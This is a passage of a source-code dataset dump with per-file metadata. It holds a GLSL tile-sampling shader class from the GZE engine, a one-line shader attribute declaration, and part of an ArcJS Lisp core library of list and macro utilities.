content
stringlengths
4
1.04M
lang
stringclasses
358 values
score
int64
0
5
repo_name
stringlengths
5
114
repo_path
stringlengths
4
229
repo_licenses
listlengths
1
8
package { import GZ.Gpu.ShaderBase.FragmentShader; import GZ.Gpu.ShaderBase.VertexShader; import GZ.Gpu.ShaderBase.ProgramShader; import GZ.Gpu.Base.Attribute; import GZ.Gpu.Base.Texture; import GZ.Gpu.Base.Uniform; import GZ.Gpu.Base.UnVec2; import GZ.Gpu.Base.UnVec3; import GZ.Gpu.Base.UnVec4; import GZ.Gpu.Base.UaVec4; import GZ.Gpu.Base.UnFloat; import GZ.Gpu.Base.UnInt; import GZ.Gpu.Base.Texture; import GZ.Gpu.ShaderBase.Vbo; import GZ.Gpu.GpuObj.GpuBatch; import GZ.Base.Perspective; import GZ.Sys.Interface.Context; import GZ.Gpu.ShaderModel.GzModel.GzShModel; import GZ.Gpu.ShaderBase.ShaderBase; import GZ.Base.Vec4; import GZ.Gfx.Effects.Light; import GZ.Gfx.Vector.Box; public class GzShCommun_Tile { public var oUnRetroRatio : UnFloat; public function GzShCommun_Tile():Void { } public static function fIniData(_oProgram:ProgramShader):Void { } public static function fAdd_VertexBasics(_oVertex:VertexShader):Bool { <glsl(_oVertex)> </glsl> } public static function fAdd_FragmentBasics(_oFrag:VertexShader):Bool { <glsl(_oFrag)> </glsl> } public static function fAdd_Vertex_Func_fTile(_oShader:VertexShader):Bool { <glsl(_oShader)> ////////////// TILE /////////////////////// #define sh_ioSrcTL (ish_Slot_0.xy) #define sh_ioSrcTR (ish_Slot_0.ba) #define sh_ioSrcBR (ish_Slot_1.xy) #define sh_ioSrcBL (ish_Slot_1.ba) #define sh_ioOffsetL1 (sh_Slot_0.xy) #define sh_ioOffsetT1 (sh_Slot_0.ba) #define sh_ioOffsetR1 (sh_Slot_1.xy) #define sh_ioOffsetB1 (sh_Slot_1.ba) #define sh_ioOffsetTL (sh_Slot_2.xy) #define sh_ioOffsetTR (sh_Slot_2.ba) #define sh_ioOffsetBR (sh_Slot_3.xy) #define sh_ioOffsetBL (sh_Slot_3.ba) #define sh_ioSrcTRBL (sh_Slot_4) #define sh_vFlip (sh_Slot_5.xy) ////////////////////////////////////////// //// TILES /////// ivec2 ioSrcTL; ivec2 ioSrcTR; ivec2 ioSrcBR; ivec2 ioSrcBL; ivec4 ioSrcTRBL; ivec2 ioOffsetL1; ivec2 ioOffsetT1; ivec2 ioOffsetR1; ivec2 ioOffsetB1; ivec2 ioOffsetTL; ivec2 ioOffsetTR; ivec2 ioOffsetBR; ivec2 ioOffsetBL; ivec2 ivTexDim; ivec2 vFlip; int nOriTX; int nOriBX; int nOriLY; int nOriRY; ////////////////// void fTile(){ ivTexDim = ivec2(TexSize[iTexID] ); //ivTexDim = ivec2(vTexCurrent); //ivTexDim = ivec2(vTexDimFetch); ///////////////////////////////////////////////////// int nOTL = int(in_TilesC.x); float _nRevX = 1.0; float _nRevY = 1.0; float _nRevD = 1.0; int _nIRevX = 1; int _nIRevY = 1; int _nIRevD = 1; if(in_TexSource0.x > in_TexSource1.x){ _nRevX = -1.0; _nIRevX = -1; } if(in_TexSource0.y > in_TexSource1.y){ _nRevY = -1.0; _nIRevY = -1; //vRetroR *= 0; } if(nOTL < 0){ nOTL *= -1; _nRevD = -1.0; _nIRevD = -1; } nOriTX = 1; nOriBX = 1; nOriLY = 1; nOriRY = 1; /* ioPtSrc1 = in_TexSource0.xy; ioPtSrc2 = in_TexSource0.zw; ioPtSrc3 = in_TexSource1.xy; ioPtSrc4 = in_TexSource1.zw; */ vec2 _vTL = in_TexSource0.xy; vec2 _vTR = in_TexSource0.zw; vec2 _vBR = in_TexSource1.xy; vec2 _vBL = in_TexSource1.zw; if(_nRevX < 0.0){ //Reverse X _vTL = in_TexSource0.zw;; _vTR = in_TexSource0.xy; _vBR = in_TexSource1.zw; _vBL = in_TexSource1.xy; } if(_nRevY < 0.0){ //Reverse Y vec2 _vTemp = _vTL; _vTL = _vBL; _vBL = _vTemp; _vTemp = _vTR; _vTR = _vBR; _vBR = _vTemp; } if(_nRevD < 0.0){ //Reverse D float _nTemp = _vTL.x; _vTL.x = _vTL.y; _vTL.y = _nTemp; _nTemp = _vTR.x; _vTR.x = _vTR.y; _vTR.y = _nTemp; _nTemp = _vBR.x; _vBR.x = _vBR.y; _vBR.y = _nTemp; _nTemp = _vBL.x; _vBL.x = _vBL.y; _vBL.y = _nTemp; } ioSrcTL = ivec2(_vTL + vec2(-0.5,-0.5) + 0.5); ioSrcTR = ivec2(_vTR + vec2(0.5,-0.5) + 0.5); ioSrcBR = ivec2(_vBR + vec2(0.5,0.5) + 0.5); ioSrcBL = ivec2(_vBL + vec2(-0.5,0.5) + 0.5); int nOL = int(in_TilesHV.x); if(nOL < 0){ nOL *= -1; nOriLY *= -1 ; } ioOffsetL1.y = nOL / ivTexDim.x; ioOffsetL1.x = nOL - ioOffsetL1.y * ivTexDim.x; int nOT = int(in_TilesHV.y); if(nOT < 0){ nOT *= -1; nOriTX *= -1 ; } ioOffsetT1.y = nOT / ivTexDim.x; ioOffsetT1.x = nOT - ioOffsetT1.y * ivTexDim.x; int nOR = int(in_TilesHV.z); if(nOR < 0){ nOR *= -1; nOriRY *= -1 ; } ioOffsetR1.y = nOR / ivTexDim.x; ioOffsetR1.x = nOR - ioOffsetR1.y * ivTexDim.x; int nOB = int(in_TilesHV.w); if(nOB < 0){ nOB *= -1; nOriBX *= -1; } ioOffsetB1.y = nOB / ivTexDim.x; ioOffsetB1.x = nOB - ioOffsetB1.y * ivTexDim.x; if(_nRevX < 0.0){ //Reverse ivec2 _vTemp = ioOffsetL1; ioOffsetL1 = ioOffsetR1; ioOffsetR1 = _vTemp; nOriTX *= -1; nOriBX *= -1; int _nTemp = nOriLY ; nOriLY = nOriRY; nOriRY = _nTemp; } if(_nRevY < 0.0){ //Reverse ivec2 _vTemp = ioOffsetT1; ioOffsetT1 = ioOffsetB1; ioOffsetB1 = _vTemp; nOriLY *= -1; nOriRY *= -1; int _nTemp = nOriTX ; nOriTX = nOriBX; nOriBX = _nTemp; } if(nOriTX > 0){ //ioSrcOT = ioSrcTL; ioSrcTRBL.r = ioSrcTL.x; }else{ //ioSrcOT = ioSrcTR; ioSrcTRBL.r = ioSrcTR.x; } if(nOriRY > 0){ //ioSrcOR = ioSrcTR; ioSrcTRBL.g = ioSrcTR.y; }else{ //ioSrcOR = ioSrcBR; ioSrcTRBL.g = ioSrcBR.y; } if(nOriBX > 0){ //ioSrcOB = ioSrcBL; ioSrcTRBL.b = ioSrcBL.x; }else{ //ioSrcOB = ioSrcBR; ioSrcTRBL.b = ioSrcBR.x; } if(nOriLY > 0){ //ioSrcOL = ioSrcTL; ioSrcTRBL.a = ioSrcTL.y; }else{ //ioSrcOL = ioSrcBL; ioSrcTRBL.a = ioSrcBL.y; } ////////////// CORNER ////////// //int nOTL = int(in_TilesC.x); Save rotate flipping ioOffsetTL.y = nOTL / ivTexDim.x; ioOffsetTL.x = nOTL - ioOffsetTL.y * ivTexDim.x; int nOTR = int(in_TilesC.y); ioOffsetTR.y = nOTR / ivTexDim.x; ioOffsetTR.x = nOTR - ioOffsetTR.y * ivTexDim.x; int nOBR = int(in_TilesC.z); ioOffsetBR.y = nOBR / ivTexDim.x; ioOffsetBR.x = nOBR - ioOffsetBR.y * ivTexDim.x; int nOBL = int(in_TilesC.w); ioOffsetBL.y = nOBL / ivTexDim.x; ioOffsetBL.x = nOBL - ioOffsetBL.y * ivTexDim.x; ///////////////////////////////////////// vFlip = ivec2(1,0); if(_nIRevD < 0){ vFlip = ivec2(0,1); } ///Send data: sh_ioOffsetL1 = bump(vec2, ioOffsetL1); sh_ioOffsetT1 = bump(vec2, ioOffsetT1); sh_ioOffsetR1 = bump(vec2, ioOffsetR1); sh_ioOffsetB1 = bump(vec2, ioOffsetB1); sh_ioOffsetTL = bump(vec2, ioOffsetTL); sh_ioOffsetTR = bump(vec2, ioOffsetTR); sh_ioOffsetBR = bump(vec2, ioOffsetBR); sh_ioOffsetBL = bump(vec2, ioOffsetBL); sh_ioSrcTRBL = bump(vec4, ioSrcTRBL); sh_vFlip = bump(vec2, vFlip ); /* sh_ioSrcTL = bump(vec2, ioSrcTL); sh_ioSrcTR = bump(vec2, ioSrcTR); sh_ioSrcBR = bump(vec2, ioSrcBR); sh_ioSrcBL = bump(vec2, ioSrcBL); */ sh_ioSrcTL = ioSrcTL; sh_ioSrcTR = ioSrcTR; sh_ioSrcBR = ioSrcBR; sh_ioSrcBL = ioSrcBL; } </glsl> } public static function fAdd_Fragment_Func_fTile(_oShader:FragmentShader):Bool { <glsl(_oShader)> ////////////// TILE /////////////////////// #define ioSrcTL (ish_Slot_0.xy) #define ioSrcTR (ish_Slot_0.ba) #define ioSrcBR (ish_Slot_1.xy) #define ioSrcBL (ish_Slot_1.ba) #define ioOffsetL1 ivec2(sh_Slot_0.xy) #define ioOffsetT1 ivec2(sh_Slot_0.ba) #define ioOffsetR1 ivec2(sh_Slot_1.xy) #define ioOffsetB1 ivec2(sh_Slot_1.ba) #define ioOffsetTL ivec2(sh_Slot_2.xy) #define ioOffsetTR ivec2(sh_Slot_2.ba) #define ioOffsetBR ivec2(sh_Slot_3.xy) #define ioOffsetBL ivec2(sh_Slot_3.ba) #define ioSrcTRBL (sh_Slot_4) #define ioSrcOT int(ioSrcTRBL.r) #define ioSrcOR int(ioSrcTRBL.g) #define ioSrcOB int(ioSrcTRBL.b) #define ioSrcOL int(ioSrcTRBL.a) #define vFlip ivec2(sh_Slot_5.xy) vec4 fTile(){ ivec2 vPosTL; ivec2 vPosTR; ivec2 vPosBR; ivec2 vPosBL; //Normal //pixTex = texture(TexCurrent, ioTexture); //float _nFactor = 1.0 - 0.01859375; //.499/32 or .495 // if(vCoDist.a + vCoDist.r > _nFactor || vCoDist.r + vCoDist.b > _nFactor || vCoDist.g + vCoDist.b > _nFactor || vCoDist.g + vCoDist.a > _nFactor){ //int _nRatio = 0; //int nRetroRatio = 4; //Work //vec2 vPosTex = vec2(ioTexture.x * vTexDimFetch.x, ioTexture.y * vTexDimFetch.y) - 0.5; //+2 px border vec2 vRetroR = vec2(1.0,1.0); //vec2 vPosTex = ioTexture * vTexDimFetch * float(1 << nRetroRatio) - 0.5; //ivec2 _vIPosTex = ivec2(vPosTex ); //vPosTL = (_vIPosTex) >> nRetroRatio; //vPosTR = (_vIPosTex + ivec2(1, 0)) >> nRetroRatio; //vPosBR = (_vIPosTex + ivec2(1, 1)) >> nRetroRatio; //vPosBL = (_vIPosTex + ivec2(0, 1)) >> nRetroRatio; //float _nRatio = float(nRetroRatio); //vec2 vPosTex = ( (ioTexture.xy).xy * vRetroR ); vec2 vPosTex = ( sh_vTexture.xy * vRetroR ); //vec2 vPosTex = (ioTexture * vTexDimFetch * vRetroR - 0.5); ivec2 _vIPosTex = ivec2(vPosTex ); float _nPrec = 0.0001; vPosTL = ivec2(vPosTex / vRetroR); vPosTR = ivec2((vPosTex + vec2(1.0-_nPrec, 0.0 )) / vRetroR); vPosBR = ivec2((vPosTex + vec2(1.0-_nPrec, 1.0-_nPrec)) / vRetroR); vPosBL = ivec2((vPosTex + vec2(0.0 , 1.0-_nPrec)) / vRetroR ); //TR Clamp oposite side (on device with not enogh precision) if(vPosTL.y >= ioSrcBR.y){vPosTL.y = ioSrcBR.y - 1;} if(vPosTL.x >= ioSrcBR.x){vPosTL.x = ioSrcBR.x - 1;} if(vPosTL == ioSrcTL){ vPosTL = ioOffsetTL; //Corner TL }else if(vPosTL.y <= ioSrcTL.y ){ //vPosTL += ivec2(ioOffsetT1); //TOP vPosTL = ioOffsetT1 + abs( ivec2(vPosTL.x - ioSrcOT, vPosTL.x - ioSrcOT) * vFlip.xy ) ; //TOP }else if(vPosTL.x <= ioSrcTL.x ){ //vPosTL += ivec2(ioOffsetL1); //Left vPosTL = ioOffsetL1 + abs( ivec2(vPosTL.y - ioSrcOL,vPosTL.y - ioSrcOL) * vFlip.yx ) ; //Left } //TR Clamp oposite side (on device with not enogh precision) if(vPosTR.y >= ioSrcBR.y){vPosTR.y = ioSrcBR.y - 1;} if(vPosTR.x <= ioSrcBL.x){vPosTR.x = ioSrcBL.x + 1;} if(vPosTR == ioSrcTR ){ vPosTR = ioOffsetTR; //Corner TR }else if(vPosTR.y <= ioSrcTR.y ){ //vPosTR += ivec2(ioOffsetT1); //Top vPosTR = ioOffsetT1 + abs(ivec2(vPosTR.x - ioSrcOT,vPosTR.x - ioSrcOT )* vFlip.xy ) ; //TOP }else if(vPosTR.x >= ioSrcTR.x ){ //vPosTR += ivec2(ioOffsetR1); //RIGHT vPosTR = ioOffsetR1 + abs( ivec2(vPosTR.y - ioSrcOR,vPosTR.y - ioSrcOR )* vFlip.yx ) ; //RIGHT } // BR Clamp oposite side if(vPosBR.y <= ioSrcTR.y){vPosBR.y = ioSrcTR.y + 1;} if(vPosBR.x <= ioSrcBL.x){vPosBR.x = ioSrcBL.x + 1;} if(vPosBR == ioSrcBR ){ vPosBR = ioOffsetBR; //Corner BR }else if(vPosBR.y >= ioSrcBR.y){ vPosBR = ioOffsetB1 + abs( ivec2(vPosBR.x - ioSrcOB, vPosBR.x - ioSrcOB) * vFlip.xy ) ; //BOT }else if(vPosBR.x >= ioSrcBR.x){ vPosBR = ioOffsetR1 + abs( ivec2(vPosBR.y - ioSrcOR,vPosBR.y - ioSrcOR) * vFlip.yx ) ; //Right } // BL Clamp oposite side if(vPosBL.y <= ioSrcTR.y){vPosBL.y = ioSrcTR.y + 1;} if(vPosBL.x >= ioSrcBR.x){vPosBL.x = ioSrcBR.x - 1;} if(vPosBL == ioSrcBL){ vPosBL = ioOffsetBL; //Corner BL }else if(vPosBL.y >= ioSrcBL.y ){ vPosBL = ioOffsetB1 + abs( ivec2(vPosBL.x - ioSrcOB,vPosBL.x - ioSrcOB ) * vFlip.xy ) ; //BOT }else if(vPosBL.x <= ioSrcBL.x){ vPosBL = ioOffsetL1 + abs( ivec2(vPosBL.y - ioSrcOL,vPosBL.y - ioSrcOL) * vFlip.yx ); //Left } vec4 vPixTL = fTexelFetch(sh_iTexID, vPosTL); vec4 vPixTR = fTexelFetch(sh_iTexID, vPosTR); vec4 vPixBR = fTexelFetch(sh_iTexID, vPosBR); vec4 vPixBL = fTexelFetch(sh_iTexID, vPosBL); /* vec4 vPixTL = texture(TexCurrent, (vec2(vPosTL) + 0.5) /vTexDimFetch ); vec4 vPixTR = texture(TexCurrent, (vec2(vPosTR) + 0.5) /vTexDimFetch); vec4 vPixBR = texture(TexCurrent, (vec2(vPosBR) + 0.5) / vTexDimFetch); vec4 vPixBL = texture(TexCurrent, (vec2(vPosBL) + 0.5) /vTexDimFetch); */ vec2 vFracTL = 1.0 - fract(vPosTex ); vec2 vFracBR = fract(vPosTex + 1.0 ); float _nRAlphaTR = (vFracBR.x * vFracTL.y); float _nRAlphaBR = (vFracBR.x * vFracBR.y); float _nRAlphaBL = (vFracTL.x * vFracBR.y); //float _nRAlphaTL = (vFracTL.x * vFracTL.y) ; float _nRAlphaTL = 1.0 - (_nRAlphaTR +_nRAlphaBR + _nRAlphaBL) ; vec4 _pix = vPixTL * _nRAlphaTL + vPixTR * _nRAlphaTR + vPixBR * _nRAlphaBR + vPixBL * _nRAlphaBL; return _pix; } </glsl> } } }
Redcode
3
VLiance/GZE
src/Lib_GZ/Gpu/ShaderModel/GzModel/GzShCommun/GzShCommun_Tile.cw
[ "Apache-2.0" ]
vec3 a_position : POSITION;
Io
1
ValtoForks/EtherealEngine
editor_data/data/shaders/vs_picking_id.io
[ "BSD-2-Clause" ]
(ns 'arc) ; export ; pair exact assoc alref join isnt alist ret in iso when unless while ; reclist recstring testify carif some all find lastn tuples defs ; caris warn (def pair (xs (o f list)) (if (is f list) (%pair xs) ((afn (xs f) (if (no xs) nil (no cdr.xs) (list (list car.xs)) (cons (f car.xs cadr.xs) (self cddr.xs f)))) xs f))) (def exact (n) (if (is (type n) 'int) t)) (def assoc (key al) (if (atom al) nil (and (acons (car al)) (is (caar al) key)) (car al) (assoc key (cdr al)))) (def alref (al key) (cadr (assoc key al))) (def join args (if (no args) nil (let a (car args) (if (no a) (apply join (cdr args)) (cons (car a) (apply join (cdr a) (cdr args))))))) (def isnt (x y) (no (is x y))) (def alist (x) (or (no x) (is (type x) 'cons))) (mac ret (var val . body) `(let ,var ,val ,@body ,var)) (mac in (x . choices) (w/uniq g `(let ,g ,x (or ,@(map1 (fn (c) `(is ,g ,c)) choices))))) ; bootstrapping version; overloaded later as a generic function (def iso (x y) (or (is x y) (and (acons x) (acons y) (iso (car x) (car y)) (iso (cdr x) (cdr y))))) (mac when (test . body) `(if ,test (do ,@body))) (mac unless (test . body) `(if (no ,test) (do ,@body))) (mac while (test . body) (w/uniq (gf gp) `((rfn ,gf (,gp) (when ,gp ,@body (,gf ,test))) ,test))) (def reclist (f xs) (and xs (or (f xs) (if (acons xs) (reclist f (cdr xs)))))) (def recstring (test s (o start 0)) ((afn (i l) (and (< i l) (or (test i) (self (+ i 1) l)))) start (len s))) (def testify (x) (if (isa x 'fn) x [iso _ x])) (def carif (x) (if (atom x) x (car x))) (def some (test seq) (let f (testify test) (if (alist seq) (reclist f:carif seq) (recstring f:seq seq)))) (def all (test seq) (~some (complement (testify test)) seq)) ;;mem -> prim (def find (test seq) (let f (testify test) (if (alist seq) (reclist [if (f:carif _) (carif _)] seq) (recstring [if (f:seq _) (seq _)] seq)))) ;; isa -> prim ;; map, mappend, firstn -> core.arc (def lastn (n xs) (rev (firstn n (rev xs)))) ;; nthcdr -> core.arc ; Generalization of pair: (tuples x) = (pair x) (def tuples (xs (o n 2) (o acc nil)) (if (no xs) (rev acc) (tuples (nthcdr n xs) n (cons (firstn n xs) acc)))) (mac defs args `(do ,@(map [cons 'def _] (tuples args 3)))) (def caris (x val) (and (acons x) (is (car x) val))) (def warn (msg . args) (disp (+ "Warning: " msg ". ")) (map [do (write _) (disp " ")] args) (disp #\newline)) (def ***setters*** () (collect-bounds-in-ns (***curr-ns***) 'setter)) (mac defset (name params . body) (let n (sym (+ name '-setter)) `(assign ,n (annotate 'setter (rfn ,n ,params ,@body))))) (defset car (x) (w/uniq g (list (list g x) `(car ,g) `(fn (val) (scar ,g val))))) (defset cdr (x) (w/uniq g (list (list g x) `(cdr ,g) `(fn (val) (scdr ,g val))))) (defset caar (x) (w/uniq g (list (list g x) `(caar ,g) `(fn (val) (scar (car ,g) val))))) (defset cadr (x) (w/uniq g (list (list g x) `(cadr ,g) `(fn (val) (scar (cdr ,g) val))))) (defset cddr (x) (w/uniq g (list (list g x) `(cddr ,g) `(fn (val) (scdr (cdr ,g) val))))) ; Note: if expr0 macroexpands into any expression whose car doesn't ; have a setter, setforms assumes it's a data structure in functional ; position. Such bugs will be seen only when the code is executed, when ; sref complains it can't set a reference to a function. (def setforms (expr0 (o setters (***setters***))) (let expr (macex expr0 'compose) (if (isa expr 'sym) (w/uniq (g h) `((,g ,expr) ,g (fn (,h) (assign ,expr ,h)))) ; make it also work for uncompressed calls to compose (and (acons expr) (in (car expr) 'compose 'complement)) (setforms (-expand-metafn-call (car expr) (cdr expr)) setters) ;; ArcJS is not supported get. ;(and (acons expr) (acons (car expr)) (is (caar expr) 'get)) ;(setforms (list (cadr expr) (cadar expr))) (aif (ref setters (sym (+ (car expr) '-setter))) (apply (rep (indirect it)) (cdr expr)) ; assumed to be data structure in fn position (do (when (caris (car expr) 'fn) (warn "Inverting what looks like a function call" expr0 expr)) (w/uniq (g h) (let argsyms (map [uniq] (cdr expr)) (list (+ (list g (car expr)) (zip argsyms (cdr expr))) `(,g ,@argsyms) `(fn (,h) (sref ,g ,h ,(car argsyms))))))))))) (def -expand-metafn-call (f args) (if (is (car f) 'compose) ((afn (fs) (if (caris (car fs) 'compose) ; nested compose (self (join (cdr (car fs)) (cdr fs))) (cdr fs) (list (car fs) (self (cdr fs))) (cons (car fs) args))) (cdr f)) (is (car f) 'no) (err "Can't invert " (cons f args)) (cons f args))) (def expand= (place val (o setters (***setters***))) (let place (if (isa place 'sym) (ssexpand place) place) (if (isa place 'sym) `(assign ,place ,val) (let (vars prev setter) (setforms place setters) (w/uniq g `(with ,(+ vars (list g val)) ;; atwith (,setter ,g))))))) (def expand=list (terms (o setters (***setters***))) `(do ,@(map (fn ((p v)) (expand= p v setters)) ; [apply expand= _] (pair terms)))) (mac = args (expand=list args (***setters***))) (mac loop (start test update . body) (w/uniq (looper loop-flag) `(do ,start ((rfn ,looper (,loop-flag) (if ,loop-flag (do ,@body ,update (,looper ,test)))) ,test)))) (mac for (v init max . body) (w/uniq (gi gm) `(with (,v nil ,gi ,init ,gm (+ ,max 1)) (loop (assign ,v ,gi) (< ,v ,gm) (assign ,v (+ ,v 1)) ,@body)))) (mac down (v init min . body) (w/uniq (gi gm) `(with (,v nil ,gi ,init ,gm (- ,min 1)) (loop (assign ,v ,gi) (> ,v ,gm) (assign ,v (- ,v 1)) ,@body)))) ; could bind index instead of gensym (mac repeat (n . body) `(for ,(uniq) 1 ,n ,@body)) (mac forlen (var s . body) `(for ,var 0 (- (len ,s) 1) ,@body)) ;(def maptable (f tbl) ; (let l (coerce tbl 'cons) ; (let rt (map1 [f car._ cadr._] l) ; (coerce rt 'table)))) (def maptable (f tbl) (let l (coerce tbl 'cons) (map1 [f car._ cadr._] l) nil)) (def walk (seq func) (if alist.seq ((afn (l) (when (acons l) (func (car l)) (self (cdr l)))) seq) (isa seq 'table) (maptable (fn (k v) (func (list k v))) seq) (forlen i seq (func seq.i)))) (mac each (var expr . body) `(walk ,expr (fn (,var) ,@body))) ; ; old definition of 'each. possibly faster, but not extendable. ; (mac each (var expr . body) ; (w/uniq (gseq gf gv) ; `(let ,gseq ,expr ; (if (alist ,gseq) ; ((rfn ,gf (,gv) ; (when (acons ,gv) ; (let ,var (car ,gv) ,@body) ; (,gf (cdr ,gv)))) ; ,gseq) ; (isa ,gseq 'table) ; (maptable (fn ,var ,@body) ; ,gseq) ; (for ,gv 0 (- (len ,gseq) 1) ; (let ,var (,gseq ,gv) ,@body)))))) ; (nthcdr x y) = (cut y x). (def cut (seq start (o end)) (let l (len seq) (with (end (if (no end) l (< end 0) (+ l end) end) start (if (< start 0) (+ l start) start) strp (isa seq 'string)) (let seq (coerce seq 'cons) (let res (firstn (- end start) (nthcdr start seq)) (if strp (coerce res 'string) res)))))) (def last (xs) (lastn 1 xs)) (def rem (test seq) (let f (testify test) (if (alist seq) ((afn (s acc) (if (no s) (nrev acc) (f (car s)) (self (cdr s) acc) (self (cdr s) (cons (car s) acc)))) seq nil) (coerce (rem f (coerce seq 'cons)) 'string)))) ; Seems like keep doesn't need to testify-- would be better to ; be able to use tables as fns. But rem does need to, because ; often want to rem a table from a list. So maybe the right answer ; is to make keep the more primitive, not rem. (def keep (test seq) (rem (complement (testify test)) seq)) ;(def trues (f seq) ; (rem nil (map f seq))) (def trues (f xs) (and xs (let fx (f (car xs)) (if fx (cons fx (trues f (cdr xs))) (trues f (cdr xs)))))) (mac do1 args (w/uniq g `(let ,g ,(car args) ,@(cdr args) ,g))) ;; caselet ;; case (mac push (x place) (w/uniq gx (let (binds val setter) (setforms place) `(let ,gx ,x (withs ,binds ;; atwiths (,setter (cons ,gx ,val))))))) (mac swap (place1 place2) (w/uniq (g1 g2) (with ((binds1 val1 setter1) (setforms place1) (binds2 val2 setter2) (setforms place2)) `(withs ,(+ binds1 (list g1 val1) binds2 (list g2 val2)) ;; atwiths (,setter1 ,g2) (,setter2 ,g1))))) (mac rotate places (with (vars (map [uniq] places) forms (map setforms places)) `(withs ,(mappend (fn (g (binds val setter)) ;; atwiths (+ binds (list g val))) vars forms) ,@(map (fn (g (binds val setter)) (list setter g)) (+ (cdr vars) (list (car vars))) forms)))) (mac pop (place) (w/uniq g (let (binds val setter) (setforms place) `(withs ,(+ binds (list g val)) (do1 (car ,g) (,setter (cdr ,g))))))) (def adjoin (x xs (o test iso)) (if (some [test x _] xs) xs (cons x xs))) (mac pushnew (x place (o test 'iso)) (let (binds val setter) (setforms place) `(withs ,binds ;; atwiths (,setter (adjoin ,x ,val ,test))))) (mac pull (test place) (let (binds val setter) (setforms place) `(withs ,binds ;; atwiths (,setter (rem ,test ,val))))) (mac togglemem (x place (o test 'iso)) (w/uniq gx (let (binds val setter) (setforms place) `(withs ,(+ (list gx x) binds) ;; atwiths (,setter (if (mem ,gx ,val) (rem ,gx ,val) (adjoin ,gx ,val ,test))))))) (mac ++ (place (o i 1)) (if (isa place 'sym) `(= ,place (+ ,place ,i)) (let (binds val setter) (setforms place) `(withs ,binds ;; atwiths (,setter (+ ,val ,i)))))) (mac -- (place (o i 1)) (if (isa place 'sym) `(= ,place (- ,place ,i)) (let (binds val setter) (setforms place) `(withs ,binds ;; atwiths (,setter (- ,val ,i)))))) ; E.g. (++ x) equiv to (zap + x 1) (mac zap (op place . args) (with (gop (uniq) gargs (map [uniq] args) mix (afn seqs (if (some no seqs) nil (+ (map car seqs) (apply self (map cdr seqs)))))) (let (binds val setter) (setforms place) `(withs ,(+ binds (list gop op) (mix gargs args)) ;; atwiths (,setter (,gop ,val ,@gargs)))))) ;(= x 10) 10 ;(zap + x 1) 11 ;x 11 ;(= x '(1 2)) (1 2) ;(zap + (cadr x) 1) 3 ;x (1 3) (mac wipe args `(do ,@(map (fn (a) `(= ,a nil)) args))) (mac set args `(do ,@(map (fn (a) `(= ,a t)) args))) ; Destructuring means ambiguity: are pat vars bound in else? (no) (mac iflet (var expr . branches) (if branches (w/uniq gv `(let ,gv ,expr (if ,gv (let ,var ,gv ,(car branches)) ,(if (cdr branches) `(iflet ,var ,@(cdr branches)))))) expr)) ;(let x '(a) ; (iflet (a . b) (cadr x) ; (list a b) ; x ; (list a b))) ; (a nil) (mac whenlet (var expr . body) `(iflet ,var ,expr (do ,@body))) (mac awhen (expr . body) `(let it ,expr (if it (do ,@body)))) (mac whilet (var test . body) (w/uniq (gf gp) `((rfn ,gf (,gp) (whenlet ,var ,gp ,@body (,gf ,test))) ,test))) (mac aand args (if (no args) t (no (cdr args)) (car args) `(let it ,(car args) (and it (aand ,@(cdr args)))))) (mac accum (accfn . body) (w/uniq gacc `(withs (,gacc nil ,accfn [push _ ,gacc]) ,@body (nrev ,gacc)))) ; Repeatedly evaluates its body till it returns nil, then returns vals. (mac drain (expr (o eof nil)) (w/uniq (gacc gdone gres) `(with (,gacc nil ,gdone nil) (while (no ,gdone) (let ,gres ,expr (if (is ,gres ,eof) (= ,gdone t) (push ,gres ,gacc)))) (rev ,gacc)))) ; For the common C idiom while x = snarfdata != stopval. ; Rename this if use it often. (mac whiler (var expr endval . body) (w/uniq gf `(withs (,var nil ,gf (testify ,endval)) (while (no (,gf (= ,var ,expr))) ,@body)))) (mac check (x test (o alt)) (w/uniq gx `(let ,gx ,x (if (,test ,gx) ,gx ,alt)))) (mac acheck (x test (o alt)) `(let it ,x (if (,test it) it ,alt))) (def pos (test seq (o start 0)) (let f (testify test) (if (alist seq) ((afn (seq n) (if (no seq) nil (f (car seq)) n (self (cdr seq) (+ n 1)))) (nthcdr start seq) start) (recstring [if (f (seq _)) _] seq start)))) (def sym (x) (coerce x 'sym)) (def int (x (o b 10)) (coerce x 'int b)) (defss x-plus-ss #/^(\d+)\+$/ (x) `(fn (a) (+ ,x a))) (defss x-minus-ss #/^(\d+)\-$/ (x) `(fn (a) (- a ,x))) (defss x-mul-ss #/^(\d+)\*$/ (x) `(fn (a) (* ,x a))) (defss x-div-ss #/^(\d+)\/$/ (x) `(fn (a) (/ a ,x))) (mac rand-choice exprs (let l (len exprs) `(case (rand ,l) ,@(mappend list (range 0 (- l 1)) exprs)))) (mac n-of (n expr) (w/uniq ga `(let ,ga nil (repeat ,n (push ,expr ,ga)) (nrev ,ga)))) (def rand-string (n (o src "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")) (withs (l (len src) a (accum acc (repeat n (acc (src (rand l)))))) (coerce a 'string))) (mac on (var s . body) (if (is var 'index) (err "Can't use index as first arg to on.") (w/uniq gs `(let ,gs ,s (forlen index ,gs (let ,var (,gs index) ,@body)))))) (def best (f seq) (if (no seq) nil (let wins (car seq) (each elt (cdr seq) (if (f elt wins) (= wins elt))) wins))) (def most (f seq) (if seq (withs (wins (car seq) topscore (f wins)) (each elt (cdr seq) (let score (f elt) (if (> score topscore) (= wins elt topscore score)))) wins))) ; Insert so that list remains sorted. Don't really want to expose ; these but seem to have to because can't include a fn obj in a ; macroexpansion. (def insert-sorted (test elt seq) (if (no seq) (list elt) (test elt (car seq)) (cons elt seq) (cons (car seq) (insert-sorted test elt (cdr seq))))) (mac insort (test elt seq) `(zap [insert-sorted ,test ,elt _] ,seq)) (def reinsert-sorted (test elt seq) (if (no seq) (list elt) (is elt (car seq)) (reinsert-sorted test elt (cdr seq)) (test elt (car seq)) (cons elt (rem elt seq)) (cons (car seq) (reinsert-sorted test elt (cdr seq))))) (mac insortnew (test elt seq) `(zap [reinsert-sorted ,test ,elt _] ,seq)) ; Could make this look at the sig of f and return a fn that took the ; right no of args and didn't have to call apply (or list if 1 arg). (def memo (f) (let cache (table) (fn args (aif (cache args) (car it) (ret res (apply f args) (= (cache args) (list res))))))) (mac defmemo (name parms . body) `(assign ,name (memo (rfn ,name ,parms ,@body)))) ; a version of readline that accepts both lf and crlf endings ; adapted from Andrew Wilcox's code (http://awwx.ws/readline) by Michael ; Arntzenius <daekharel@gmail.com> (def sum (f xs) (let n 0 (each x xs (++ n (f x))) n)) (def treewise (f base tree) (if (atom tree) (base tree) (f (treewise f base (car tree)) (treewise f base (cdr tree))))) ; Could prob be generalized beyond printing. (def prall 